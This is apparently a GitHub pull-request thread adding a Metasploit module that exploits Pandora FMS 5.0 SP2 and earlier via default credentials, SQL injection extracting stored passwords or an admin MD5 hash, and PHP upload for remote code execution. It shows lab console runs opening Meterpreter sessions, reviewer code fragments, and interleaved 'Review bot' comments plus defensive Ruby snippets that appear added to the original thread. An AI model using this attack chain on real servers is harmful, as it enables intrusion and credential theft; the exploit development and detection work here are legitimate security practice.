Added Pandora FMS RCE and SQLi module #2985

Merged
merged 1 commit into from Nov 26, 2014

pyoor commented Feb 12, 2014

This is a corrected PR to replace PR #2979.

Remote Code Execution in Pandora FMS 5.0 SP2 and below (Tested on 4.0.2/4.1.1/5.0SP2 appliances).

How to replicate the vulnerable environment:

Download Pandora FMS 5.2 SP2: http://sourceforge.net/projects/pandora/files/Pandora%20FMS%205.0/FinalSP2/PandoraFMS5.0SP2-131226_64bit.iso/download

This module performs several steps in order to gain RCE. First, the module attempts to authenticate using default credentials. If this fails, a SQL injection vulnerability affecting the mobile login form is exploited. Pandora FMS implements an "Auto login" hash which stores plaintext passwords in the database. Leveraging the SQLi, the plaintext password is extracted and used to authenticate. Once authenticated, this module will leverage the file manager functionality in order to upload a PHP payload.

If all methods fail the SQLi is leveraged in order to extract the admin MD5 password hash for offline cracking.

Using default credentials:

msf > use exploit/linux/http/pandorafms_sqli 
msf exploit(pandorafms_sqli) > show options

Module options (exploit/linux/http/pandorafms_sqli):

   Name       Current Setting    Required  Description
   ----       ---------------    --------  -----------
   PASS       pandora            no        The password to authenticate with
   Proxies                       no        Use a proxy chain
   RHOST                         yes       The target address
   RPORT      80                 yes       The target port
   TARGETURI  /pandora_console/  yes       The URI of the vulnerable Pandora FMS instance
   USER       admin              no        The username to authenticate with
   VHOST                         no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Pandora FMS version <= 5.0 SP2


msf exploit(pandorafms_sqli) > set RHOST 192.168.0.117
RHOST => 192.168.0.117
msf exploit(pandorafms_sqli) > exploit

[*] Started reverse handler on 192.168.0.134:4444 
[*] 192.168.0.117:80 - Attempting to authenticate using (admin:pandora)
[*] 192.168.0.117:80 - Successfully authenticated!
[*] 192.168.0.117:80 - Attempting to retrieve session cookie
[*] 192.168.0.117:80 - Successfully retrieved session cookie: PHPSESSID=8vulgtr2l7c38b7ev6kv1jlg27
[*] 192.168.0.117:80 - Attempting to inject payload
[*] 192.168.0.117:80 - Successfully injected payload
[*] Sending stage (39195 bytes) to 192.168.0.117
[*] Meterpreter session 1 opened (192.168.0.134:4444 -> 192.168.0.117:40361) at 2014-02-11 13:01:03 -0500
[*] 192.168.0.117:80 - Cleaning script remnants
[*] 192.168.0.117:80 - Script removed successfully

Using "Auto login" hash mechanism:

[*] Started reverse handler on 192.168.0.134:4444 
[*] 192.168.0.117:80 - Attempting to authenticate using (admin:badpassword)
[-] 192.168.0.117:80 - Authentication failed!
[*] 192.168.0.117:80 - Attempting to extract auto login hash
[*] 192.168.0.117:80 - Extracted auto login password (foobar123)
[*] 192.168.0.117:80 - Attempting to authenticate using (admin:foobar123)
[*] 192.168.0.117:80 - Successfully authenticated!
[*] 192.168.0.117:80 - Attempting to retrieve session cookie
[*] 192.168.0.117:80 - Successfully retrieved session cookie: PHPSESSID=hifh2b2vnscfjn196p8p4tskh3
[*] 192.168.0.117:80 - Attempting to inject payload
[*] 192.168.0.117:80 - Successfully injected payload
[*] Sending stage (39195 bytes) to 192.168.0.117
[*] Meterpreter session 2 opened (192.168.0.134:4444 -> 192.168.0.117:40362) at 2014-02-11 13:02:46 -0500
[*] 192.168.0.117:80 - Cleaning script remnants
[*] 192.168.0.117:80 - Script removed successfully

Resort to password extraction:

[*] Started reverse handler on 192.168.0.134:4444 
[*] 192.168.0.117:80 - Attempting to authenticate using (admin:badpassword)
[-] 192.168.0.117:80 - Authentication failed!
[*] 192.168.0.117:80 - Attempting to extract auto login hash
[-] 192.168.0.117:80 - No auto login password has been defined!
[*] 192.168.0.117:80 - Attempting to extract admin password hash
[*] 192.168.0.117:80 - Extracted admin password hash - [ 1da7ee7d45b96d0e1f45ee4ee23da560 ]
[-] Exploit failed: 192.168.0.117:80 - Unable to perform remote code execution!
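Added here as a defender-side example (not code from the PR or from Metasploit): the runs in this thread drop the PHP payload into the console's images/ directory and the manual cleanup sometimes fails, so scanning that directory for stray PHP sources is a cheap check on a Pandora FMS host. The console root path is an assumption; the eight-letter name pattern follows the payload filenames quoted in the thread.

```ruby
require 'pathname'
require 'time'

# Payload names seen in this thread (AzbMMllu.php, yFTyUBDf.php, tjcqynwI.php,
# YTDhlSEr.php) are eight ASCII letters followed by ".php".
RANDOM_PHP_NAME = /\A[A-Za-z]{8}\.php\z/.freeze

# Walk <console_root>/images and describe every PHP source found there. The
# images directory of the console should contain no PHP at all, so each hit is
# worth a look. `console_root` is assumed to be the pandora_console directory,
# e.g. /var/www/html/pandora_console as in the meterpreter listing in the thread.
def leftover_php_in_images(console_root)
  images = Pathname.new(console_root).join('images')
  return [] unless images.directory?
  php_files = images.glob('**/*').select { |p| p.file? && p.extname.casecmp?('.php') }
  php_files.sort.map do |path|
    st = path.stat
    {
      path: path.to_s,
      size: st.size,
      mtime: st.mtime,
      random_name: RANDOM_PHP_NAME.match?(path.basename.to_s),
      world_readable: (st.mode & 0o004) != 0
    }
  end
end

# One line per finding, suitable for a cron job or a ticket.
def report_lines(findings)
  findings.map do |f|
    tag = f[:random_name] ? 'random-name' : 'named'
    "#{f[:path]} #{f[:size]}B #{f[:mtime].utc.iso8601} #{tag}"
  end
end

if __FILE__ == $PROGRAM_NAME
  root = ARGV[0] || '/var/www/html/pandora_console' # assumed default install path
  puts report_lines(leftover_php_in_images(root))
end
```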

wchen-r7 commented Feb 12, 2014

Thanks for the update. You're not actually replacing the current Pandora exploit, though. You're adding another one. It would make more sense to simply update the file in my opinion.


pyoor commented Feb 12, 2014

@wchen-r7 Sorry, I'm confused. Has PR #2979 already been fully merged?
The reason I issued this PR is that #2979 showed 0 commits and I had already deleted that branch.

Also, this PR includes the changes requested by @jlee-r7 and @jvazquez-r7.


jlee-r7 commented Feb 12, 2014

@wchen-r7 no, this is a different bug.


wchen-r7 commented Feb 12, 2014

Ah ok. My bad.


jlee-r7 commented Feb 14, 2014

I have no idea what is up with #2979, but I'll take this one.

+ 'uri' => normalize_uri(uri, "index.php")
+ })
+
+ if res && res.code == 200 and res.body =~ /Pandora FMS - the Flexible Monitoring System/ && res.body =~ /(?<=xx-small;">v)(.*?)(?=<\/td>)/
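Review bot: this condition mixes `and` with `&&`; `and` binds looser than `&&` (and than `=`), so the expression only groups correctly by accident and breaks the moment its result is assigned to a variable. Use `&&` throughout: `if res && res.code == 200 && res.body =~ /Pandora FMS - the Flexible Monitoring System/ && res.body =~ /(?<=xx-small;">v)(.*?)(?=<\/td>)/`. Note also that the version regex only matches a `xx-small;">v...</td>` cell, so a console that renders its version with different markup yields no match and therefore no version.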
jlee-r7 commented Feb 14, 2014

Don't use and. && instead, please

+ return Exploit::CheckCode::Unknown
+ end
+
+ if version and version <= "4.1.1"
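Review bot: `version <= "4.1.1"` compares version strings lexicographically, so for example "10.0.1" sorts below "4.1.1" and a future major release would be reported as affected. Split the string into numeric components (and a service-pack number for values such as 5.0SP2) before comparing. The same `and`/`&&` mix flagged above applies to this line.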
jlee-r7 commented Feb 14, 2014

Don't use and. && instead, please

+ # Extract password hash from database
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri("#{uri}", "mobile/index.php"),
jlee-r7 commented Feb 14, 2014

      'uri'    => normalize_uri(uri, "mobile", "index.php"),

pyoor commented Feb 17, 2014

Implemented @jlee-r7's requested changes in commit faae51f.


pyoor commented Feb 21, 2014

@jlee-r7 Is everything good with the latest commit? I just wanted to make sure that I addressed all of your change requests.

jlee-r7 referenced this pull request in pyoor/metasploit-framework on Mar 10, 2014: "Improvements for PandoraFMS SQLi module #1" (merged), with commit message:

Merge pull request #1 from jlee-r7/land-2985-pandorafms-sqli
Improvements for PandoraFMS SQLi module

jvazquez-r7 commented Mar 28, 2014

Thanks @pyoor! Waiting to hear from travis and testing...


jvazquez-r7 commented Mar 28, 2014

Exploit looks like it's working:

msf exploit(pandorafms_sqli) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.137:80 - Attempting to authenticate using (admin:pandora)
[*] 192.168.172.137:80 - Successfully authenticated!
[*] 192.168.172.137:80 - Attempting to retrieve session cookie
[*] 192.168.172.137:80 - Successfully retrieved session cookie: PHPSESSID=6e66ucgkun60oqe8tlr9imd834;
[*] 192.168.172.137:80 - Attempting to upload payload
[*] 192.168.172.137:80 - Successfully uploaded payload
[*] Sending stage (39848 bytes) to 192.168.172.137
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.137:33137) at 2014-03-28 17:54:16 -0500
[*] 192.168.172.137:80 - Cleaning script remnants
[-] 192.168.172.137:80 - Could not identify file manager form!
[!] 192.168.172.137:80 - Failed to remove yFTyUBDf.php

meterpreter > ls

Listing: /var/www/html/pandora_console/images
=============================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  1381   fil   2014-03-28 11:52:54 -0500  AzbMMllu.php
100644/rw-r--r--  5615   fil   2013-12-25 19:12:19 -0600  MiniLogoArtica.jpg
100644/rw-r--r--  1440   fil   2013-12-25 19:12:19 -0600  add.disabled.png
100644/rw-r--r--  1437   fil   2013-12-25 19:12:19 -0600  add.png

but not the check method:

msf exploit(pandorafms_sqli) > check
[*] 192.168.172.137:80 - Cannot reliably check exploitability.
+ return Exploit::CheckCode::Unknown
+ end
+
+ if version && version <= "4.1.1"
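Review bot: the threshold here is still "4.1.1" while the module's target table says `Pandora FMS version <= 5.0 SP2` and the description says 5.0 SP2 and below were tested; with this comparison "5.0SP2" is not <= "4.1.1", so the check cannot report a 5.0 SP2 console as vulnerable even when the version is detected. Either raise the threshold to cover 5.0SP2 or document why check is narrower than the exploit.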
jvazquez-r7 commented Mar 28, 2014

Doesn't look consistent with the description, maybe a typo?

+ 'uri' => normalize_uri(uri, "index.php")
+ })
+
+ if res && res.code == 200 && res.body =~ /Pandora FMS - the Flexible Monitoring System/ && res.body =~ /(?<=xx-small;">v)(.*?)(?=<\/td>)/
jvazquez-r7 commented Mar 28, 2014

After running the live CD (not install), and running the Pandora FMS Console, I see:

<div id="ver_num">5.0SP2</div>

in the HTML of the pandora_console/index.php response.
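Added example (not code from the PR, from jvazquez-r7 or from Metasploit) of version detection that accepts both markups mentioned in this thread and compares versions numerically rather than as strings, which is what the check-method discussion above needs. The verdict symbols are my own, not Metasploit's CheckCode constants.

```ruby
# Markups for the console version quoted in this thread: the module's regex
# expects a `xx-small;">v4.1.1</td>` cell, while the 5.0SP2 live CD returns
# `<div id="ver_num">5.0SP2</div>`.
PANDORA_VERSION_PATTERNS = [
  /<div id="ver_num">\s*([^<]+?)\s*<\/div>/,
  /xx-small;">v([^<]+?)<\/td>/
].freeze

# Last release this module targets ("Pandora FMS version <= 5.0 SP2").
LAST_AFFECTED = '5.0SP2'.freeze

# Pull a version string such as "4.1.1" or "5.0SP2" out of the HTML, or nil.
def pandora_version_from_html(html)
  PANDORA_VERSION_PATTERNS.each do |re|
    m = re.match(html)
    return m[1] if m
  end
  nil
end

# Map "5.0SP2" to [5, 0, 0, 2] and "4.1.1" to [4, 1, 1, 0] so Array#<=> orders
# releases numerically; as plain strings "10.0" would sort before "4.1.1".
def pandora_version_key(ver)
  base, sp = ver.split(/sp/i, 2)
  nums = (base.split('.').map(&:to_i) + [0, 0, 0]).first(3)
  nums + [sp.to_i] # nil.to_i is 0 when there is no service pack
end

# :appears when a version was found and is <= 5.0 SP2, :safe when it is newer,
# :unknown when the page carries no recognisable version (hypothetical
# verdicts, not Metasploit's CheckCode values).
def pandora_check_verdict(html)
  ver = pandora_version_from_html(html)
  return :unknown unless ver
  (pandora_version_key(ver) <=> pandora_version_key(LAST_AFFECTED)) <= 0 ? :appears : :safe
end

if __FILE__ == $PROGRAM_NAME
  # Constructed responses modelled on the two markups above.
  [
    '<div id="ver_num">5.0SP2</div>',
    '<td style="font-size: xx-small;">v4.1.1</td>',
    '<div id="ver_num">5.1</div>',
    '<html><body>no version shown</body></html>'
  ].each { |html| puts "#{pandora_check_verdict(html)}  #{html}" }
end
```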


jvazquez-r7 commented Mar 28, 2014

I would recommend changing the filename to be snake_case compliant:

git mv modules/exploits/linux/http/pandorafms_sqli.rb modules/exploits/linux/http/pandora_fms_sqli.rb 
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::FileDropper
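Review bot: `Msf::Exploit::FileDropper` is included here but, as the "Cleaning script remnants" / "Failed to remove" output in this thread shows, removal is done by hand through the file manager form and fails whenever that form is not found. Call `register_files_for_cleanup` with the uploaded path once the upload succeeds and let FileDropper delete the file through the session, which is what the `[+] Deleted YTDhlSEr.php` line in the final test run reflects.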
jvazquez-r7 commented Mar 28, 2014

Looks like you're not using FileDropper, but cleaning by yourself in cleanup.

+ return auth_succeeded?(res)
+ end
+
+ def loginhash
jvazquez-r7 commented Mar 28, 2014

It's worth using snake_case for the function names: login_hash

+ }
+ })
+
+ if res && res.code == 200 && res.body.include?("Success")
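Review bot: deciding that the upload worked from `res.body.include?("Success")` is loose; any page that happens to contain that word passes, so a failed upload whose error page echoes it would still be reported as "Successfully uploaded payload". Since the next step requests the uploaded file anyway, treat that request's response (a 200 for the file) as the real success signal and keep the body check only as an early hint.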
jvazquez-r7 commented Mar 28, 2014

It's not removing the uploaded file, even after successful exploitation:

msf exploit(pandorafms_sqli) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.137:80 - Attempting to authenticate using (admin:pandora)
[*] 192.168.172.137:80 - Successfully authenticated!
[*] 192.168.172.137:80 - Attempting to retrieve session cookie
[*] 192.168.172.137:80 - Successfully retrieved session cookie: PHPSESSID=k0u5e0fn8k3rdm0s3mevb6stk2;
[*] 192.168.172.137:80 - Attempting to upload payload
[*] 192.168.172.137:80 - Successfully uploaded payload
[*] Sending stage (39848 bytes) to 192.168.172.137
[*] Meterpreter session 4 opened (192.168.172.1:4444 -> 192.168.172.137:33148) at 2014-03-28 18:06:50 -0500
[*] 192.168.172.137:80 - Cleaning script remnants
[-] 192.168.172.137:80 - Could not identify file manager form!
[!] 192.168.172.137:80 - Failed to remove tjcqynwI.php

meterpreter > 

(just saying, I'm using the livecd version)

+ end
+
+ # Trigger Payload
+ res = send_request_cgi({
jvazquez-r7 commented Mar 28, 2014

Probably you would like to add 1 as the timeout to this send_request_cgi call, so you don't need to wait for the full timeout on send_request_cgi.

jvazquez-r7 commented Mar 28, 2014

Just do:

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, "images", @payload_name),
      'cookie' => @cookie
    }, 1)

jvazquez-r7 commented May 30, 2014

ping @pyoor, do you mind taking care of the comments, please? Thanks!


jvazquez-r7 commented Nov 25, 2014

Looks like the author has abandoned this one :( I'm going to try to do the cleanup myself and hopefully land it.

@jvazquez-r7 jvazquez-r7 assigned jvazquez-r7 and unassigned jlee-r7 Nov 25, 2014

@jvazquez-r7 jvazquez-r7 merged commit b3f7447 into rapid7:master Nov 26, 2014

1 check passed: the Travis CI build passed

jvazquez-r7 added a commit that referenced this pull request Nov 26, 2014


jvazquez-r7 commented Nov 26, 2014

Finished the PR myself; see the final result here: c82acfe

Thanks @pyoor for your submission. If you don't feel comfortable with any change in the landed version, please feel free to do a new pull request. I finished the cleanup myself because it sat in the pull request queue for too long. Thanks!

Testing:
msf exploit(pandora_fms_sqli) > check
[*] 172.16.158.134:80 - The target appears to be vulnerable.
msf exploit(pandora_fms_sqli) > set VERBOSE true
VERBOSE => true
msf exploit(pandora_fms_sqli) > check

[*] 172.16.158.134:80 - Trying to detect installed version
[*] 172.16.158.134:80 - Pandora FMS 5.0SP2 found
[*] 172.16.158.134:80 - The target appears to be vulnerable.
msf exploit(pandora_fms_sqli) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.134:80 - Attempting to authenticate using (admin:pandora)
[*] 172.16.158.134:80 - Successfully authenticated!
[*] 172.16.158.134:80 - Attempting to retrieve session cookie
[*] 172.16.158.134:80 - Successfully retrieved session cookie: PHPSESSID=s1l1pc45m23jujmm46g64rm714;
[*] 172.16.158.134:80 - Uploading PHP payload...
[*] 172.16.158.134:80 - Attempting to upload payload YTDhlSEr.php...
[*] 172.16.158.134:80 - Successfully uploaded payload
[*] 172.16.158.134:80 - Executing payload...
[*] Sending stage (40551 bytes) to 172.16.158.134
[+] Deleted YTDhlSEr.php

meterpreter > getuid
Server username: apache (48)
meterpreter > exit
[*] Shutting down Meterpreter...
msf exploit(pandora_fms_sqli) > set USER badlogin
USER => badlogin
msf exploit(pandora_fms_sqli) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.134:80 - Attempting to authenticate using (badlogin:pandora)
[-] 172.16.158.134:80 - Authentication failed!
[*] 172.16.158.134:80 - Attempting to extract auto login hash via SQLi
[-] 172.16.158.134:80 - No auto login password has been defined!
[*] 172.16.158.134:80 - Attempting to extract admin password hash with SQLi
[+] 172.16.158.134:80 - Extracted admin password hash, unsalted md5 - [ 1da7ee7d45b96d0e1f45ee4ee23da560 ]
[-] Exploit failed [no-access]: 172.16.158.134:80 - Unable to perform remote code execution!
[*] Exploit completed, but no session was created.